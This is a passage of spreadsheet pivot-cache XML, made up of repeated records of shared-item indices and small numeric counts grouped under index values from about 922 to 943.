    <n v="0"/>
    <x v="922"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="922"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="922"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="922"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="922"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="922"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="922"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="922"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="922"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="922"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="923"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="923"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="923"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="923"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="923"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="923"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="923"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="923"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="923"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="923"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="923"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="923"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="923"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="923"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="924"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="924"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="924"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="924"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="924"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="924"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="924"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="924"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="924"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="8"/>
    <x v="924"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="924"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="924"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="924"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="924"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="381"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="381"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="381"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="381"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="5"/>
    <x v="381"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="381"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="381"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="381"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="925"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="925"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="925"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="925"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="925"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="925"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="14"/>
    <x v="925"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="925"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="925"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="925"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="925"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="925"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="925"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="925"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="926"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="926"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="2"/>
    <x v="926"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="926"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="10"/>
    <x v="926"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="926"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="926"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="926"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="926"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="926"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="926"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="926"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="926"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="926"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="927"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="927"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="927"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="927"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="927"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="927"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="927"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="21"/>
    <x v="927"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="927"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="927"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="18"/>
    <x v="927"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="78"/>
    <x v="927"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="927"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="927"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="924"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="928"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="928"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="928"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="928"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="928"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="928"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="928"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="928"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="928"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="928"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="928"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="928"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="928"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="928"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="929"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="929"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="929"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="929"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="929"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="929"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="929"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="929"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="929"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="929"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="929"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="6"/>
    <x v="929"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="929"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="929"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="930"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="930"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="930"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="930"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="930"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="930"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="930"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="930"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="930"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="930"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="930"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="930"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="930"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="930"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="931"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="931"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="931"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="931"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="931"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="931"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="931"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="931"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="931"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="931"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="931"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="931"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="931"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="931"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="932"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="932"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="932"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="932"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="932"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="932"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="932"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="932"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="932"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="932"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="932"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="932"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="932"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="932"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="933"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="933"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="933"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="933"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="49"/>
    <x v="933"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="18"/>
    <x v="933"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="933"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="933"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="933"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="933"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="933"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="933"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="933"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="933"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="934"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="934"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="934"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="934"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="934"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="934"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="934"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="934"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="934"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="934"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="934"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="934"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="934"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="934"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="935"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="935"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="935"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="935"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="935"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="935"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="935"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="935"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="935"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="935"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="935"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="935"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="935"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="935"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="936"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="936"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="936"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="936"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="936"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="936"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="936"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="936"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="936"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="936"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="936"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="25"/>
    <x v="936"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="28"/>
    <x v="936"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="936"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="937"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="937"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="937"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="937"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="937"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="937"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="937"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="937"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="4"/>
    <x v="937"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="937"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="937"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="937"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="937"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="937"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="938"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="938"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="938"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="938"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="938"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="938"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="938"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="938"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="938"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="938"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="938"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="938"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="28"/>
    <x v="938"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="938"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="939"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="939"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="939"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="939"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="939"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="939"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="939"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="939"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="939"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="939"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="939"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="939"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="939"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="939"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="940"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="940"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="940"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="940"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="940"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="940"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="47"/>
    <x v="940"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="940"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="940"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="940"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="940"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="940"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="940"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="940"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="941"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="941"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="941"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="941"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="941"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="941"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="941"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="941"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="941"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="941"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="14"/>
    <x v="941"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="12"/>
    <x v="941"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="941"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="941"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="942"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="942"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="942"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="942"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="942"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="942"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="942"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="9"/>
    <x v="942"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="942"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="942"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="17"/>
    <x v="942"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="139"/>
    <x v="942"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="942"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="942"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="943"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
